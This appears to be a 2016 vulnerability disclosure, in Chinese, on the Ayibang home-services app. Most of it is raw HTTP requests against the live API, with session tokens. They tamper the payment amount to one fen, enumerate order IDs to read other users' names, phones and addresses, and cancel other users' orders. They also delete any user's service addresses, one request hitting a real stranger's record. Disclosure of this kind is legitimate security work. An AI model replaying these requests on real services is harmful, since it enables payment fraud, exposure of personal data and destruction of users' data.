阿姨帮最新APP漏洞大全(支付漏洞/地址/订单遍历/删除等)

危害：看文章自己脑补
漏洞等级：高
提交时间： 2016-02-02 12:45

简要描述：

阿姨帮最新版APP(v6.2.0)漏洞打包

详细说明：

支付漏洞

1. 超低价格支付订单

点击首页，随便选择一项服务并下订单

image_1cg3udg33qk4cgk6f64krptq9.png-62.5kB

image_1cg3ufnh119mf1a2a1edf5vbjum.png-78.7kB

2. 点击确认支付抓包并先截断提交：

POST https://api-cust.ayibang.com/v1/pay/wx/sign HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452845167007
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 128
out_trade_no=11291191&attach=0_1_13800000000_0&body=%E9%98%BF%E5%A7%A8%E5%B8%AE%E6%94%AF%E4%BB%98&total_fee=5000&trade_type=AP

将上面的total_fee的值改为1，提交

image_1cg3ul0q0178ondf136n1bklbpj13.png-38.2kB

支付成功后订单成为待确认状态，说明支付成功

image_1cg3ulbjk776vs8imhrn34kd1g.png-47.3kB

任意用户订单查看

点击我们刚生成的订单，系统访问如下地址：

GET https://api-cust.ayibang.com/v1/order/detail?orderID=11291191 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452845324989
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

orderID=11291191处可遍历，burp出手对订单的后四位遍历

image_1cg3untagce0og8n901nln75e1t.png-212.4kB

N多订单信息可看

image_1cg3uo8rl1o5ii0p3kfrq8117h2a.png-282.2kB

以订单ID为11290071为例，可查看到该订单涉及用户的姓名手机号住址等

image_1cg3uokl71f7b1um568d15kjcjs2n.png-228.7kB

任意用户订单取消漏洞

点击之前的订单，点击取消订单，会抓到如下请求包:

POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452846770206
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 42
data=%7B%22orderID%22%3A%2211291191%22%7D&

post处内容url解码后为：{“orderID”:”11291191”}

通过遍历orderID可删除所有订单
通过另一手机注册一个账号并下一个订单

image_1cg3ur1ec14g027r19g41dkt1mcf34.png-40.7kB

抓包查得该订单ID为11292401

提交以下数据包：

POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452846770206
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 42
data=%7B%22orderID%22%3A%2211292401%22%7D&

成功取消订单

image_1cg3ut157c3iebiblu6bi9uo3h.png-203.1kB

再查看该用户订单列表，已经成为空：

image_1cg3utb0fmnlhhrq2vb4ibrj3u.png-26.9kB

任意用户服务地址删除

1. 点击app里面服务地址

image_1cg3uu7cn1ogc1ii614lh1r111qnm4b.png-46.6kB

2. 添加两个地址

image_1cg3uurka153p7s6m3c1lc1ohf4o.png-28.1kB

然后删除上面的两个地址，并抓包

1. 删除第一个地址请求数据包如下：

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17334752 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
Network: WiFi
City: nanjing
Timestamp: 1452841496773
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

返回数据包如下：

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Jan 2016 07:04:57 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/5.6.11
Content-Length: 628
{"house":{"id":"17334752","custID":"16989352","city":"nanjing","cityName":"\u5357\u4eac","zone":"null","nameAddr":"\u5b9e\u9a8c\

上面内容解码后如下：
image_1cg3v42g41m3b18ku15es1ea418n055.png-104.9kB

可以看到statusName处标记为已删除，并且数据包返回的ID与删除的ID为同一ID：17334752

再删除另外一个地址：

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
Network: WiFi
City: nanjing
Timestamp: 1452841783577
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

由此可看到系统删除服务地址是根据不同的ID来实现的，虽然数字不是连续的，但是经过几次尝试发现都是以17开头的8位数字，如此遍可以通过遍历id删除其它用户的服务地址

只需提交以下数据包：

1
2
3

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

通过burpsuite 遍历houseID处，即可删除所有用户收获地址

以下为我随便找的一个用户地址（抱歉给这位用户带来困扰）：

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17330512 HTTP/1.1
Host: api-cust.ayibang.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 OPR/34.0.2036.47
DNT: 1
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: zh-CN,zh;q=0.8

返回：
image_1cg3v85b91grlggsheep5k144b5i.png-104.3kB

漏洞证明

如果需要通过浏览器复现上面问题，需要注意数据请求处有一个请求头：
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
此处的authorization是用户在登录APP的时候服务器返回的认证key
image_1cg3vad5f5mr1rjf6j9k5m1fv55v.png-279.8kB

十年寒窗无人问，一举成名天下知
– Cai_Team